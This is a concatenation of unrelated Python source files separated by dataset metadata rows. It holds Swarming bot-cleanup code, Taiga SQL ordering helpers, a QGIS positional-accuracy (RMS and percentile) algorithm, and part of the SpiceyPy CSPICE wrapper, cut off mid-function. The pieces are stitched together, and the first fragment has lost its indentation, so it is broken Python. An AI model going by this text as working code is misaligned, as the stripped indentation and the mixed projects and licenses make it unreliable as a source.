# Delete the whole group. An ancestor query will retrieve the entity
# itself too, so no need to explicitly delete it.
keys = ndb.Query(ancestor=bot_root_key).fetch(keys_only=True)
ndb.delete_multi(keys)
total += len(keys)
logging.info(
'Deleted %d entities from the following bots (%d skipped):\n%s',
total, skipped, ', '.join(sorted(deleted)))
deleted = []
if utils.utcnow() >= time_to_stop:
break
return total
except runtime.DeadlineExceededError:
pass
finally:
logging.info(
'Deleted %d entities from the following bots (%d skipped):\n%s', total,
skipped, ', '.join(sorted(deleted)))
def cron_aggregate_dimensions():
"""Aggregates dimensions for all pools and each pool."""
# {
# 'all': { 'os': set(...), 'cpu': set(...), ...},
# 'pool1': { 'os': set(...), 'cpu': set(...), ...},
# ...
# }
seen = defaultdict(lambda: defaultdict(set))
now = utils.utcnow()
for b in BotInfo.query():
groups = get_pools_from_dimensions_flat(b.dimensions_flat)
groups.append('all')
for i in b.dimensions_flat:
k, v = i.split(':', 1)
if k == 'id':
continue
for g in groups:
seen[g][k].add(v)
for group, dims in seen.items():
dims_prop = [
DimensionValues(dimension=k, values=sorted(values))
for k, values in sorted(dims.items())
]
logging.info('Saw dimensions %s in %s', dims_prop, group)
# TODO(jwata): remove the 'current' key after switching to the 'all' key.
if group == 'all':
DimensionAggregation(
key=DimensionAggregation.KEY, dimensions=dims_prop, ts=now).put()
DimensionAggregation(
key=get_aggregation_key(group), dimensions=dims_prop, ts=now).put()
def task_bq_events(start, end):
"""Sends BotEvents to BigQuery swarming.bot_events table."""
def _convert(e):
"""Returns a tuple(bq_key, row)."""
out = swarming_pb2.BotEvent()
e.to_proto(out)
bq_key = e.id + ':' + e.ts.strftime(u'%Y-%m-%dT%H:%M:%S.%fZ')
return (bq_key, out)
total = 0
q = BotEvent.query(BotEvent.ts >= start, BotEvent.ts <= end)
cursor = None
more = True
while more:
entities, cursor, more = q.fetch_page(500, start_cursor=cursor)
total += len(entities)
bq_state.send_to_bq('bot_events', [_convert(e) for e in entities])
return total
| apache-2.0 | 6,103,475,689,103,912,000 | 33.29708 | 80 | 0.647767 | false | 3.548713 | false | false | false |
bdang2012/taiga-back-casting | taiga/projects/custom_attributes/services.py | 1 | 2749 | # Copyright (C) 2014-2015 Andrey Antukh <[email protected]>
# Copyright (C) 2014-2015 Jesús Espino <[email protected]>
# Copyright (C) 2014-2015 David Barragán <[email protected]>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.db import transaction
from django.db import connection
@transaction.atomic
def bulk_update_userstory_custom_attribute_order(project, user, data):
cursor = connection.cursor()
sql = """
prepare bulk_update_order as update custom_attributes_userstorycustomattribute set "order" = $1
where custom_attributes_userstorycustomattribute.id = $2 and
custom_attributes_userstorycustomattribute.project_id = $3;
"""
cursor.execute(sql)
for id, order in data:
cursor.execute("EXECUTE bulk_update_order (%s, %s, %s);",
(order, id, project.id))
cursor.execute("DEALLOCATE bulk_update_order")
cursor.close()
@transaction.atomic
def bulk_update_task_custom_attribute_order(project, user, data):
cursor = connection.cursor()
sql = """
prepare bulk_update_order as update custom_attributes_taskcustomattribute set "order" = $1
where custom_attributes_taskcustomattribute.id = $2 and
custom_attributes_taskcustomattribute.project_id = $3;
"""
cursor.execute(sql)
for id, order in data:
cursor.execute("EXECUTE bulk_update_order (%s, %s, %s);",
(order, id, project.id))
cursor.execute("DEALLOCATE bulk_update_order")
cursor.close()
@transaction.atomic
def bulk_update_issue_custom_attribute_order(project, user, data):
cursor = connection.cursor()
sql = """
prepare bulk_update_order as update custom_attributes_issuecustomattribute set "order" = $1
where custom_attributes_issuecustomattribute.id = $2 and
custom_attributes_issuecustomattribute.project_id = $3;
"""
cursor.execute(sql)
for id, order in data:
cursor.execute("EXECUTE bulk_update_order (%s, %s, %s);",
(order, id, project.id))
cursor.execute("DEALLOCATE bulk_update_order")
cursor.close()
| agpl-3.0 | -7,095,326,727,825,272,000 | 38.811594 | 99 | 0.692028 | false | 3.702156 | false | false | false |
lcoandrade/DsgTools | core/DSGToolsProcessingAlgs/Algs/OtherAlgs/pecCalculatorAlgorithm.py | 1 | 8434 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
DsgTools
A QGIS plugin
Brazilian Army Cartographic Production Tools
-------------------
begin : 2019-05-31
git sha : $Format:%H$
copyright : (C) 2019 by Philipe Borba - Cartographic Engineer @ Brazilian Army
Emerson Xavier - Cartographic Engineer @ Brazilian Army
email : [email protected]
[email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
import math
import functools
from ...algRunner import AlgRunner
import processing
from PyQt5.QtCore import QCoreApplication
from qgis.core import (QgsProcessing,
QgsFeatureSink,
QgsProcessingAlgorithm,
QgsProcessingParameterFeatureSource,
QgsProcessingParameterFeatureSink,
QgsFeature,
QgsDataSourceUri,
QgsProcessingOutputVectorLayer,
QgsProcessingParameterVectorLayer,
QgsWkbTypes,
QgsProcessingParameterBoolean,
QgsProcessingParameterEnum,
QgsProcessingParameterNumber,
QgsProcessingParameterMultipleLayers,
QgsProcessingUtils,
QgsSpatialIndex,
QgsGeometry,
QgsProcessingParameterField,
QgsProcessingMultiStepFeedback,
QgsProcessingParameterFile,
QgsProcessingParameterExpression,
QgsProcessingException,
QgsFeatureRequest,
QgsRectangle)
class PecCalculatorAlgorithm(QgsProcessingAlgorithm):
INPUT = 'INPUT'
REFERENCE = 'REFERENCE'
TOLERANCE = 'TOLERANCE'
# OUTPUT = 'OUTPUT'
def initAlgorithm(self, config):
"""
Parameter setting.
"""
self.addParameter(
QgsProcessingParameterVectorLayer(
self.INPUT,
self.tr('Input layer'),
[QgsProcessing.TypeVectorPoint]
)
)
self.addParameter(
QgsProcessingParameterVectorLayer(
self.REFERENCE,
self.tr('Reference layer'),
[QgsProcessing.TypeVectorPoint]
)
)
self.addParameter(
QgsProcessingParameterNumber(
self.TOLERANCE,
self.tr('Max distance'),
minValue=0,
type=QgsProcessingParameterNumber.Double,
defaultValue=2
)
)
def processAlgorithm(self, parameters, context, feedback):
"""
Here is where the processing itself takes place.
"""
inputLyr = self.parameterAsVectorLayer(
parameters,
self.INPUT,
context
)
referenceLyr = self.parameterAsVectorLayer(
parameters,
self.REFERENCE,
context
)
tol = self.parameterAsDouble(
parameters,
self.TOLERANCE,
context
)
distanceDict = dict()
featList = [i for i in inputLyr.getFeatures()]
step = 100/len(featList) if featList else 0
for current, feat in enumerate(featList):
if feedback.isCanceled():
break
if not feat.geometry().isGeosValid():
continue
id = feat.id()
geom = feat.geometry().asGeometryCollection()[0].asPoint()
x = geom.x()
y = geom.y()
bbox = QgsRectangle(
x-tol,
y-tol,
x+tol,
y+tol
)
request = QgsFeatureRequest()
request.setFilterRect(bbox)
minDistance = 0
candidateId = None
for candidateFeat in referenceLyr.getFeatures(request):
dist = feat.geometry().distance(candidateFeat.geometry())
if candidateId is None:
minDistance = dist
candidateId = candidateFeat.id()
continue
elif dist < minDistance:
minDistance = dist
candidateId = candidateFeat.id()
if candidateId is not None:
distanceDict[id] = {
'minDistance' : minDistance,
'candidateId' : candidateId
}
feedback.setProgress(current*step)
distanceList = [i['minDistance'] for i in distanceDict.values()]
n = len(distanceList)
distanceSquared = [i['minDistance']**2 for i in distanceDict.values()]
rms = math.sqrt(sum(distanceSquared)/n)
percFunc = functools.partial(self.percentile, frequency=0.9)
perc = percFunc(distanceList)
mean = sum(distanceList)/n
feedback.pushInfo('MEAN: {mean}'.format(mean=mean))
feedback.pushInfo('RMS: {rms}'.format(rms=rms))
feedback.pushInfo('PERC: {perc}'.format(perc=perc))
return {}
def percentile(self, N, frequency, key=lambda x:x):
"""
Find the percentile of a list of values.
@parameter N - is a list of values. Note N MUST BE already sorted.
@parameter percent - a float value from 0.0 to 1.0.
@parameter key - optional key function to compute value from each element of N.
@return - the percentile of the values
"""
if not N:
return None
sortedN = sorted(N)
if len(sortedN) < 1:
return 0 if not sortedN else 1
if frequency <= 0 :
return sortedN[0]
elif frequency >= 1:
return sortedN[-1]
position = frequency * (len(sortedN) - 1)
bottom = math.floor(position)
top = math.ceil(position)
if top == bottom:
return sortedN[top]
return (sortedN[bottom] * (1. + bottom - position) + sortedN[top] * (1. + position - top) )
def name(self):
"""
Returns the algorithm name, used for identifying the algorithm. This
string should be fixed for the algorithm, and must not be localised.
The name should be unique within each provider. Names should contain
lowercase alphanumeric characters only and no spaces or other
formatting characters.
"""
return 'peccalculator'
def displayName(self):
"""
Returns the translated algorithm name, which should be used for any
user-visible display of the algorithm name.
"""
return self.tr('Calculate RMS and Percentile 90 of Layer')
def group(self):
"""
Returns the name of the group this algorithm belongs to. This string
should be localised.
"""
return self.tr('Data Quality')
def groupId(self):
"""
Returns the unique ID of the group this algorithm belongs to. This
string should be fixed for the algorithm, and must not be localised.
The group id should be unique within each provider.
"""
return 'DSGTools: Data Quality'
def tr(self, string):
return QCoreApplication.translate('PecCalculatorAlgorithm', string)
def createInstance(self):
return PecCalculatorAlgorithm() | gpl-2.0 | -3,897,906,194,792,418,000 | 36.488889 | 99 | 0.507351 | false | 5.396033 | false | false | false |
drbitboy/SpiceyPy | spiceypy/spiceypy.py | 1 | 506780 | """
The MIT License (MIT)
Copyright (c) [2015-2018] [Andrew Annex]
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import ctypes
from .utils import support_types as stypes
from .utils.libspicehelper import libspice
from . import config
from .utils.callbacks import SpiceUDFUNS, SpiceUDFUNB
import functools
import numpy
from contextlib import contextmanager
__author__ = 'AndrewAnnex'
################################################################################
# Default buffer length (in characters) allocated for output strings
# returned from CSPICE routines that take a "lenout" argument.
_default_len_out = 256
# Maximum number of columns selectable in an EK query.
_SPICE_EK_MAXQSEL = 100  # Twice the 50 in gcc-linux-64
# Default room (element count) for EK record fetches; presumably sized
# generously — TODO confirm against CSPICE EK limits.
_SPICE_EK_EKRCEX_ROOM_DEFAULT = 100  # Enough?
def checkForSpiceError(f):
    """
    Internal helper: if the CSPICE error system reports a failure, collect
    the error details, reset the error state, and raise a SpiceyError.

    :param f: the wrapped function (currently unused; kept for the caller's
        signature).
    :raise stypes.SpiceyError: when the SPICE failed flag is set.
    """
    if not failed():
        return
    # Gather the pieces of the SPICE error report in the same order the
    # error system exposes them, then clear the error state before raising.
    toolkit_version = tkvrsn("TOOLKIT").replace("CSPICE_", "")
    short_message = getmsg("SHORT", 26)
    explanation = getmsg("EXPLAIN", 100).strip()
    long_message = getmsg("LONG", 321).strip()
    trace = qcktrc(200)
    msg = stypes.errorformat.format(
        tkvsn=toolkit_version,
        short=short_message,
        explain=explanation,
        long=long_message,
        traceback=trace)
    reset()
    raise stypes.SpiceyError(msg)
def spiceErrorCheck(f):
    """
    Decorator for spiceypy hooking into the spice error system.

    After the wrapped function returns, the CSPICE failed flag is checked
    via :func:`checkForSpiceError`; if an error occurred a
    :exc:`~spiceypy.utils.support_types.SpiceyError` is raised with an
    output similar to outmsg.

    :type f: builtins.function
    :return: the wrapped function.
    :rtype: builtins.function
    """
    @functools.wraps(f)
    def with_errcheck(*args, **kwargs):
        # NOTE: the original wrapped this in ``try: ... except: raise``,
        # which is a no-op; exceptions propagate unchanged without it.
        res = f(*args, **kwargs)
        checkForSpiceError(f)
        return res

    return with_errcheck
def spiceFoundExceptionThrower(f):
    """
    Decorator for wrapping functions that use status codes
    """
    @functools.wraps(f)
    def wrapper(*args, **kwargs):
        res = f(*args, **kwargs)
        # When found-checking is disabled, hand back the raw result,
        # found flag(s) included.
        if not config.catch_false_founds:
            return res
        # By convention the found flag is the last element of the result.
        found = res[-1]
        if isinstance(found, bool) and not found:
            raise stypes.SpiceyError("Spice returns not found for function: {}".format(f.__name__), found=found)
        if hasattr(found, '__iter__') and not all(found):
            raise stypes.SpiceyError("Spice returns not found in a series of calls for function: {}".format(f.__name__), found=found)
        # Found flag(s) OK: strip them, unwrapping a single remaining value.
        actualres = res[0:-1]
        return actualres[0] if len(actualres) == 1 else actualres

    return wrapper
@contextmanager
def no_found_check():
    """
    Temporarily disables spiceypy default behavior which raises exceptions for
    false found flags for certain spice functions. All spice
    functions executed within the context manager will no longer check the found
    flag return parameter and the found flag will be included in the return for
    the given function.
    For Example bodc2n in spiceypy is normally called like::

        name = spice.bodc2n(399)

    With the possibility that an exception is thrown in the even of a invalid ID::

        name = spice.bodc2n(-999991) # throws a SpiceyError

    With this function however, we can use it as a context manager to do this::

        with spice.no_found_check():
            name, found = spice.bodc2n(-999991) # found is false, no exception raised!

    Within the context any spice functions called that normally check the found
    flags will pass through the check without raising an exception if they are false.

    """
    current_catch_state = config.catch_false_founds
    config.catch_false_founds = False
    # try/finally ensures the previous state is restored even if the body of
    # the ``with`` block raises; without it an exception would leave
    # found-checking disabled globally.
    try:
        yield
    finally:
        config.catch_false_founds = current_catch_state
@contextmanager
def found_check():
    """
    Temporarily enables spiceypy default behavior which raises exceptions for
    false found flags for certain spice functions. All spice
    functions executed within the context manager will check the found
    flag return parameter and the found flag will be removed from the return for
    the given function.
    For Example bodc2n in spiceypy is normally called like::

        name = spice.bodc2n(399)

    With the possibility that an exception is thrown in the even of a invalid ID::

        name = spice.bodc2n(-999991) # throws a SpiceyError

    With this function however, we can use it as a context manager to do this::

        with spice.found_check():
            found = spice.bodc2n(-999991) # will raise an exception!

    Within the context any spice functions called that normally check the found
    flags will raise an exception if the found flag returned is false.

    """
    current_catch_state = config.catch_false_founds
    config.catch_false_founds = True
    # try/finally ensures the previous state is restored even if the body of
    # the ``with`` block raises; without it an exception would leave
    # found-checking enabled globally.
    try:
        yield
    finally:
        config.catch_false_founds = current_catch_state
def found_check_off():
    """
    Method that turns off found catching: spice functions that return a
    found flag will no longer raise when that flag is false.
    """
    config.catch_false_founds = False
def found_check_on():
    """
    Method that turns on found catching: spice functions that return a
    found flag will raise a SpiceyError when that flag is false.
    """
    config.catch_false_founds = True
def get_found_catch_state():
    """
    Returns the current found catch state.

    :return: True if false found flags currently raise exceptions.
    :rtype: bool
    """
    return config.catch_false_founds
################################################################################
# A
@spiceErrorCheck
def appndc(item, cell):
    """
    Append an item to a character cell.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/appndc_c.html

    :param item: The item (or list of items) to append.
    :type item: str or list
    :param cell: The cell to append to.
    :type cell: spiceypy.utils.support_types.SpiceCell
    """
    assert isinstance(cell, stypes.SpiceCell)
    # Normalize to a list so a single string and a list of strings share
    # one code path; each entry is converted to a C string and appended.
    entries = item if isinstance(item, list) else [item]
    for entry in entries:
        libspice.appndc_c(stypes.stringToCharP(entry), cell)
@spiceErrorCheck
def appndd(item, cell):
    """
    Append an item to a double precision cell.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/appndd_c.html

    :param item: The item (or iterable of items) to append.
    :type item: Union[float,Iterable[float]]
    :param cell: The cell to append to.
    :type cell: spiceypy.utils.support_types.SpiceCell
    """
    assert isinstance(cell, stypes.SpiceCell)
    # Treat a scalar as a one-element sequence so both cases share a loop.
    if not hasattr(item, "__iter__"):
        item = [item]
    for value in item:
        libspice.appndd_c(ctypes.c_double(value), cell)
@spiceErrorCheck
def appndi(item, cell):
    """
    Append an item to an integer cell.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/appndi_c.html

    :param item: The item (or iterable of items) to append.
    :type item: Union[int,Iterable[int]]
    :param cell: The cell to append to.
    :type cell: spiceypy.utils.support_types.SpiceCell
    """
    assert isinstance(cell, stypes.SpiceCell)
    # Treat a scalar as a one-element sequence so both cases share a loop.
    if not hasattr(item, "__iter__"):
        item = [item]
    for value in item:
        libspice.appndi_c(ctypes.c_int(value), cell)
@spiceErrorCheck
def axisar(axis, angle):
    """
    Construct a rotation matrix that rotates vectors by a specified
    angle about a specified axis.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/axisar_c.html

    :param axis: Rotation axis.
    :type axis: 3 Element vector (list, tuple, numpy array)
    :param angle: Rotation angle, in radians.
    :type angle: float
    :return: Rotation matrix corresponding to axis and angle.
    :rtype: numpy array ((3, 3))
    """
    # CSPICE fills the output matrix in place; convert inputs inline.
    rotation = stypes.emptyDoubleMatrix()
    libspice.axisar_c(stypes.toDoubleVector(axis),
                      ctypes.c_double(angle),
                      rotation)
    return stypes.cMatrixToNumpy(rotation)
################################################################################
# B
@spiceErrorCheck
def b1900():
    """
    Return the Julian Date corresponding to Besselian Date 1900.0.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/b1900_c.html

    :return: The Julian Date corresponding to Besselian Date 1900.0.
    :rtype: float
    """
    # Constant value supplied directly by CSPICE; takes no arguments.
    return libspice.b1900_c()
@spiceErrorCheck
def b1950():
    """
    Return the Julian Date corresponding to Besselian Date 1950.0.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/b1950_c.html

    :return: The Julian Date corresponding to Besselian Date 1950.0.
    :rtype: float
    """
    # Constant value supplied directly by CSPICE; takes no arguments.
    return libspice.b1950_c()
@spiceErrorCheck
def badkpv(caller, name, comp, insize, divby, intype):
    """
    Determine if a kernel pool variable is present and if so
    that it has the correct size and type.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/badkpv_c.html

    :param caller: Name of the routine calling this routine.
    :type caller: str
    :param name: Name of a kernel pool variable.
    :type name: str
    :param comp: Comparison operator.
    :type comp: str
    :param insize: Expected size of the kernel pool variable.
    :type insize: int
    :param divby: A divisor of the size of the kernel pool variable.
    :type divby: int
    :param intype: Expected type of the kernel pool variable
    :type intype: str
    :return: returns false if the kernel pool variable is OK.
    :rtype: bool
    """
    # Convert each Python argument to its ctypes counterpart; intype is a
    # single character, so it is passed as c_char rather than a string.
    caller_p = stypes.stringToCharP(caller)
    name_p = stypes.stringToCharP(name)
    comp_p = stypes.stringToCharP(comp)
    insize_c = ctypes.c_int(insize)
    divby_c = ctypes.c_int(divby)
    intype_c = ctypes.c_char(intype.encode(encoding='UTF-8'))
    return bool(libspice.badkpv_c(caller_p, name_p, comp_p,
                                  insize_c, divby_c, intype_c))
@spiceErrorCheck
def bltfrm(frmcls, outCell=None):
    """
    Return a SPICE set containing the frame IDs of all built-in frames
    of a specified class.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/bltfrm_c.html

    :param frmcls: Frame class.
    :type frmcls: int
    :param outCell: Optional SpiceInt Cell that is returned
    :type outCell: spiceypy.utils.support_types.SpiceCell
    :return: Set of ID codes of frames of the specified class.
    :rtype: spiceypy.utils.support_types.SpiceCell
    """
    frmcls = ctypes.c_int(frmcls)
    # Compare against None explicitly: the old ``if not outCell`` truthiness
    # test could silently discard a caller-supplied cell that evaluates
    # falsy (e.g. an empty cell), allocating a fresh one instead.
    if outCell is None:
        outCell = stypes.SPICEINT_CELL(1000)
    libspice.bltfrm_c(frmcls, outCell)
    return outCell
@spiceErrorCheck
@spiceFoundExceptionThrower
def bodc2n(code, lenout=_default_len_out):
    """
    Translate the SPICE integer code of a body into a common name
    for that body.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/bodc2n_c.html

    :param code: Integer ID code to be translated into a name.
    :type code: int
    :param lenout: Maximum length of output name.
    :type lenout: int
    :return: A common name for the body identified by code.
    :rtype: str
    """
    # Pre-allocate the output buffer; CSPICE writes the name into it and
    # sets the found flag when a mapping exists.
    name_p = stypes.stringToCharP(" " * lenout)
    found = ctypes.c_int()
    libspice.bodc2n_c(ctypes.c_int(code), ctypes.c_int(lenout),
                      name_p, ctypes.byref(found))
    return stypes.toPythonString(name_p), bool(found.value)
@spiceErrorCheck
def bodc2s(code, lenout=_default_len_out):
    """
    Translate a body ID code to either the corresponding name or if no
    name to ID code mapping exists, the string representation of the
    body ID value.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/bodc2s_c.html

    :param code: Integer ID code to translate to a string.
    :type code: int
    :param lenout: Maximum length of output name.
    :type lenout: int
    :return: String corresponding to 'code'.
    :rtype: str
    """
    # Pre-allocate the output buffer; CSPICE always produces a string,
    # falling back to the decimal representation of the ID code.
    name_p = stypes.stringToCharP(" " * lenout)
    libspice.bodc2s_c(ctypes.c_int(code), ctypes.c_int(lenout), name_p)
    return stypes.toPythonString(name_p)
@spiceErrorCheck
def boddef(name, code):
    """
    Define a body name/ID code pair for later translation via
    :func:`bodn2c` or :func:`bodc2n`.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/boddef_c.html

    :param name: Common name of some body.
    :type name: str
    :param code: Integer code for that body.
    :type code: int
    """
    # Pure side-effect call: registers the mapping inside CSPICE.
    libspice.boddef_c(stypes.stringToCharP(name), ctypes.c_int(code))
@spiceErrorCheck
def bodfnd(body, item):
    """
    Determine whether values exist for some item for any body
    in the kernel pool.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/bodfnd_c.html

    :param body: ID code of body.
    :type body: int
    :param item: Item to find ("RADII", "NUT_AMP_RA", etc.).
    :type item: str
    :return: True if the item is in the kernel pool, and is False if it is not.
    :rtype: bool
    """
    # CSPICE returns a SpiceBoolean; coerce it to a Python bool.
    return bool(libspice.bodfnd_c(ctypes.c_int(body),
                                  stypes.stringToCharP(item)))
@spiceErrorCheck
@spiceFoundExceptionThrower
def bodn2c(name):
    """
    Translate the name of a body or object to the corresponding SPICE
    integer ID code.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/bodn2c_c.html

    :param name: Body name to be translated into a SPICE ID code.
    :type name: str
    :return: SPICE integer ID code for the named body.
    :rtype: int
    """
    # Output parameters are written by CSPICE via byref pointers.
    code = ctypes.c_int(0)
    found = ctypes.c_int(0)
    libspice.bodn2c_c(stypes.stringToCharP(name),
                      ctypes.byref(code), ctypes.byref(found))
    return code.value, bool(found.value)
@spiceErrorCheck
@spiceFoundExceptionThrower
def bods2c(name):
    """
    Translate a string containing a body name or ID code to an integer code.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/bods2c_c.html

    :param name: String to be translated to an ID code.
    :type name: str
    :return: Integer ID code corresponding to name.
    :rtype: int
    """
    # Output parameters are written by CSPICE via byref pointers.
    code = ctypes.c_int(0)
    found = ctypes.c_int(0)
    libspice.bods2c_c(stypes.stringToCharP(name),
                      ctypes.byref(code), ctypes.byref(found))
    return code.value, bool(found.value)
@spiceErrorCheck
def bodvar(body, item, dim):
    """
    Deprecated: This routine has been superseded by :func:`bodvcd` and
    :func:`bodvrd`. This routine is supported for purposes of backward
    compatibility only.

    Return the values of some item for any body in the kernel pool.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/bodvar_c.html

    :param body: ID code of body.
    :type body: int
    :param item:
            Item for which values are desired,
            ("RADII", "NUT_PREC_ANGLES", etc.)
    :type item: str
    :param dim: Number of values returned.
    :type dim: int
    :return: values
    :rtype: Array of floats
    """
    # dim doubles as both the requested size (for the buffer allocation)
    # and an output parameter filled in by CSPICE.
    dim_c = ctypes.c_int(dim)
    values = stypes.emptyDoubleVector(dim_c.value)
    libspice.bodvar_c(ctypes.c_int(body), stypes.stringToCharP(item),
                      ctypes.byref(dim_c), values)
    return stypes.cVectorToPython(values)
@spiceErrorCheck
def bodvcd(bodyid, item, maxn):
    """
    Fetch from the kernel pool the double precision values of an item
    associated with a body, where the body is specified by an integer ID
    code.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/bodvcd_c.html

    :param bodyid: Body ID code.
    :type bodyid: int
    :param item:
            Item for which values are desired,
            ("RADII", "NUT_PREC_ANGLES", etc.)
    :type item: str
    :param maxn: Maximum number of values that may be returned.
    :type maxn: int
    :return: dim, values
    :rtype: tuple
    """
    # Allocate the output buffer from the Python-level maxn before it is
    # converted; dim receives the actual number of values returned.
    dim = ctypes.c_int()
    values = stypes.emptyDoubleVector(maxn)
    libspice.bodvcd_c(ctypes.c_int(bodyid), stypes.stringToCharP(item),
                      ctypes.c_int(maxn), ctypes.byref(dim), values)
    return dim.value, stypes.cVectorToPython(values)
@spiceErrorCheck
def bodvrd(bodynm, item, maxn):
    """
    Fetch from the kernel pool the double precision values
    of an item associated with a body.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/bodvrd_c.html

    :param bodynm: Body name.
    :type bodynm: str
    :param item:
            Item for which values are desired,
            ("RADII", "NUT_PREC_ANGLES", etc.)
    :type item: str
    :param maxn: Maximum number of values that may be returned.
    :type maxn: int
    :return: tuple of (dim, values)
    :rtype: tuple
    """
    # Allocate the output buffer from the Python-level maxn before it is
    # converted; dim receives the actual number of values returned.
    dim = ctypes.c_int()
    values = stypes.emptyDoubleVector(maxn)
    libspice.bodvrd_c(stypes.stringToCharP(bodynm), stypes.stringToCharP(item),
                      ctypes.c_int(maxn), ctypes.byref(dim), values)
    return dim.value, stypes.cVectorToPython(values)
@spiceErrorCheck
def brcktd(number, end1, end2):
    """
    Bracket a double precision number: clamp it into the interval
    delimited by the two endpoints (a value already inside the interval
    is returned unchanged; otherwise the nearest endpoint is returned).

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/brcktd_c.html

    :param number: Number to be bracketed.
    :type number: float
    :param end1: One of the bracketing endpoints for number.
    :type end1: float
    :param end2: The other bracketing endpoint for number.
    :type end2: float
    :return: value within an interval
    :rtype: float
    """
    return libspice.brcktd_c(ctypes.c_double(number), ctypes.c_double(end1),
                             ctypes.c_double(end2))
@spiceErrorCheck
def brckti(number, end1, end2):
    """
    Bracket an integer: clamp it into the interval delimited by the two
    endpoints (a value already inside the interval is returned unchanged;
    otherwise the nearest endpoint is returned).

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/brckti_c.html

    :param number: Number to be bracketed.
    :type number: int
    :param end1: One of the bracketing endpoints for number.
    :type end1: int
    :param end2: The other bracketing endpoint for number.
    :type end2: int
    :return: value within an interval
    :rtype: int
    """
    return libspice.brckti_c(ctypes.c_int(number), ctypes.c_int(end1),
                             ctypes.c_int(end2))
@spiceErrorCheck
def bschoc(value, ndim, lenvals, array, order):
    """
    Binary search for a given value within a character string array,
    accompanied by an order vector. Return the index of the matching
    array entry, or -1 if the key value is not found.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/bschoc_c.html

    :param value: Key value to be found in array.
    :type value: str
    :param ndim: Dimension of array.
    :type ndim: int
    :param lenvals: String length.
    :type lenvals: int
    :param array: Character string array to search.
    :type array: list of strings
    :param order: Order vector.
    :type order: Array of ints
    :return: index
    :rtype: int
    """
    ndim_c = ctypes.c_int(ndim)
    lenvals_c = ctypes.c_int(lenvals)
    # The 2-D character buffer is shaped by the wrapped dimensions.
    array_p = stypes.listToCharArrayPtr(array, xLen=lenvals_c, yLen=ndim_c)
    return libspice.bschoc_c(stypes.stringToCharP(value), ndim_c, lenvals_c,
                             array_p, stypes.toIntVector(order))
@spiceErrorCheck
def bschoi(value, ndim, array, order):
    """
    Binary search for a given value within an integer array, accompanied
    by an order vector. Return the index of the matching array entry, or
    -1 if the key value is not found.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/bschoi_c.html

    :param value: Key value to be found in array.
    :type value: int
    :param ndim: Dimension of array.
    :type ndim: int
    :param array: Integer array to search.
    :type array: Array of ints
    :param order: Order vector.
    :type order: Array of ints
    :return: index
    :rtype: int
    """
    return libspice.bschoi_c(ctypes.c_int(value), ctypes.c_int(ndim),
                             stypes.toIntVector(array),
                             stypes.toIntVector(order))
@spiceErrorCheck
def bsrchc(value, ndim, lenvals, array):
    """
    Binary search for a given value within a character string array.
    Return the index of the first matching array entry, or -1 if the key
    value was not found.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/bsrchc_c.html

    :param value: Key value to be found in array.
    :type value: str
    :param ndim: Dimension of array.
    :type ndim: int
    :param lenvals: String length.
    :type lenvals: int
    :param array: Character string array to search.
    :type array: list of strings
    :return: index
    :rtype: int
    """
    ndim_c = ctypes.c_int(ndim)
    lenvals_c = ctypes.c_int(lenvals)
    # The 2-D character buffer is shaped by the wrapped dimensions.
    array_p = stypes.listToCharArrayPtr(array, xLen=lenvals_c, yLen=ndim_c)
    return libspice.bsrchc_c(stypes.stringToCharP(value), ndim_c, lenvals_c,
                             array_p)
@spiceErrorCheck
def bsrchd(value, ndim, array):
    """
